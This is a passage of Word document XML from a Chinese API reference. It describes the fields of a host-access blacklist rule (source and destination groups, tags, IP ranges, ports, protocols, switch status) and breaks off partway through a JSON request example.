            <w:r>
              <w:t>被访问主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2528C3C6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1795DF0C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>dstIpRanges</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B9A80A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2146C12B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="326D4625" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问者</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="17905508" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27EB3D9A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstAgentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06A6F90B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EACC208" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="549C9F19" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问自定义主机范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="132A5319" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="171ACA4F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcRealmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79CFE73A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37E6948E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23DDE86D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问者范围，1:业务组、标签，2:自定义主机，3：自定义</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3FC60612" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59C2B415" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcGroups</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D8366D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="550D1E72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7355DB2B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问主机业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4549AF09" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AE3A759" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcTags</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A97CDC1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CBD6FCF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A771410" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2E267C2E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36CCC49C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcIpRanges</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="689F746E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48427F0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A10B618" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问者</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0CC3B6D8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1576B2CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcAgentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05B61DE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36A58F3E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08750815" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问自定义主机范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4D08A0B0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B4A2C33" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="778E6F0D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E472D5A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BA39143" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6C1DECF6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F0968C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>protos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0704DF1A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60EFAF40" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66231D0A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2D207226" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53187B86" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D479BB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F2DCC17" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AFB7E13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="69144522" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50C7EE13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayDstIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="210539AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60827577" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07E14B59" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>目标IP搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3ABA923A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49AD2535" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displaySrcIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="127945C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="517605B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37C5CF9D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>源IP搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6A2B5B2D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22888CE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayPort</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B91EE27" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="586A3A83" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E53A69A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1F891AA0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C55C9A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>switchStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2225F29F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24D98745" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48271CCF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>开关状态，0：关闭，1：打开</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69CF3567" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IpRange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="827"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1138E1C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D40A2FC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43B96CF9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B96549D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="101ACB72" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E3B5C59" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>startIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5652AB3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C7FDBAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>开始</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0EEEE797" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EFBA137" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>endIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46649BCA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CB961F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>结束</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E37568E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C008976" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strategyName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "新建黑名单-20220606164812",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"remark": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>"ports": ["7788"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"protos": ["TCP"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "7788",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>switchStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dstTagIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ["all"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dstGroupIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [9],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dstRealmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
